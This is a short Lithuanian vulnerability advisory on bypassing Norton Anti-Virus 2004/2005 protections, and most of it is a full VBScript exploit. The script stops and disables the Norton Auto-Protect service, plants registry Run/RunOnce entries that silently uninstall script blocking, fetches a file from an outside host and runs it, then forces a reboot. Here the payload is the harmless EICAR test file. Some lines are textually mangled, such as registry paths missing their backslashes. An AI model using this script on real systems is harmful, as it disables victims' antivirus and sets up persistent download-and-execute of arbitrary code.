Norton Anti-Virus paketo apribojimų apėjimas
Programa: Norton Anti-Virus 2004, 2005;
Gamintojo svetainė: www.symantec.com
Pavojaus lygis: Žemas
Eksploitas/Pataisos: Yra / Nėra
Aprašymas:
Pažeidžiamumas aptiktas Norton Anti-Virus pakete. Įsilaužėlis gali per nuotolį apeiti blokavimo funkciją ir pakeisti antiviruso konfigūracijos failą, o specialiai sukurtu scenarijumi apeiti scenarijų blokavimą ir sistemoje atlikti kenkėjiškus veiksmus.
Pavyzdys:
————–//// BEGIN DISABLE_NAV.VBS ////—————–
‘ —– DISABLE NORTON AUTO-PROTECT SERVICE WITH WMI —–
sServer = „.”
Set oWMI = GetObject(„winmgmts://.”)
sServiceName = „Norton AntiVirus Auto-Protect Service”
sWQL = „Select state from Win32_Service ” _
& „Where displayname='” & sServiceName & „‘”
Set oResults = oWMI.ExecQuery(sWQL)
For Each oService In oResults
oService.StopService
oService.ChangeStartMode(„Disabled”)
Next
‘ ——– UNINSTALL SCRIPT BLOCKING WITH WMI 😉 ———-
const HKEY_LOCAL_MACHINE = &H80000002
strComputer = „.”
Set objRegistry =
GetObject(„winmgmts:{impersonationLevel=impersonate}!\.rootdefault:StdRegProv”)
strKeyPath = „SOFTWAREMicrosoftWindowsCurrentVersionRunOnce”
strValueName = „Uninstall Norton Script Blocking”
arrStringValues = („MSIEXEC /x {D327AFC9-7BAA-473A-8319-6EB7A0D40138} /Q”)
objRegistry.SetStringValue HKEY_LOCAL_MACHINE, strKeyPath, strValueName,
arrStringValues
‘ ——– CREATE VBS FILE TO GRAB THE EICAR AV-REFERENCE FILE ———
Set objRegistry =
GetObject(„winmgmts:{impersonationLevel=impersonate}!\.rootdefault:StdRegProv”)
strKeyPath = „SOFTWAREMicrosoftWindowsCurrentVersionRunOnce”
strValueName = „Create Code Downloader”
arrStringValues = („cmd /c ECHO Set
X=CreateObject(„+chr(34)+”Microsoft.XMLHTTP”+chr(34)+”):X.open
” +chr(34)+”GET”+chr(34)+”,(„+chr(34)+”http://www.eicar.org/download/eicar.com”+chr(34)+”),False:X.s end:set
Y=createobject(„+chr(34)+”adodb.stream”+chr(34)+”):Y.type=1:Y.open:Y.write
X.responseBody:Y.savetofile(„+chr(34)+”eicar.com”+chr(34)+”),2:Y.close >
estart.VBS”)
objRegistry.SetStringValue HKEY_LOCAL_MACHINE, strKeyPath, strValueName,
arrStringValues
‘ ——– CREATE VBS FILE THAT TRIGGERS CODE LAUNCH ———-
Set objRegistry =
GetObject(„winmgmts:{impersonationLevel=impersonate}!\.rootdefault:StdRegProv”)
strKeyPath = „SOFTWAREMicrosoftWindowsCurrentVersionRunOnce”
strValueName = „Create Code Launcer”
arrStringValues = („cmd /c ECHO wscript.sleep(10000):Set
Z=CreateObject(„+chr(34)+”WSCript.Shell”+chr(34)+”):Z.run(„+chr(34)+”cmd
/k eicar.com”+chr(34)+”) > elaunch.vbs”)
objRegistry.SetStringValue HKEY_LOCAL_MACHINE, strKeyPath, strValueName,
arrStringValues
‘ ——– LAUNCH EICAR DOWNLOADER ———-
Set objRegistry =
GetObject(„winmgmts:{impersonationLevel=impersonate}!\.rootdefault:StdRegProv”)
strKeyPath = „SOFTWAREMicrosoftWindowsCurrentVersionRun”
strValueName = „Execute Code DownLoader”
arrStringValues = („estart.vbs”)
objRegistry.SetStringValue HKEY_LOCAL_MACHINE, strKeyPath, strValueName,
arrStringValues
‘ ——– RUN THE ‘VIRUS’ ———-
Set objRegistry =
GetObject(„winmgmts:{impersonationLevel=impersonate}!\.rootdefault:StdRegProv”)
str KeyPath = „SOFTWAREMicrosoftWindowsCurrentVersionRun”
strValueName = „Execute Malicious Code Launcher”
arrStringValues = („elaunch.vbs”)
objRegistry.SetStringValue HKEY_LOCAL_MACHINE, strKeyPath, strValueName,
arrStringValues
‘ —- USE WMI TO FORCE A REBOOT — NEXT LOGIN, PWN3D —-
Set wmi = GetObject(„winmgmts:{(Shutdown)}”)
set objset = wmi.instancesof(„win32_operatingsystem”)
for each obj in objset
set os = obj : exit for
next
os.win32shutdown 2 + 4
————–//// END DISABLE_NAV.VBS ////—————–
2000 m. gegužės 5 d. įkurtas elektroninis (ISSN) leidinys – mokslui, švietimui, pramogoms ir gyvenimiškoms aktualijoms skirtas portalas www.straipsniai.lt, kovojantis su kasdienine rutina. Šiandien portale paskelbta virš 15000 straipsnių ir naujienų.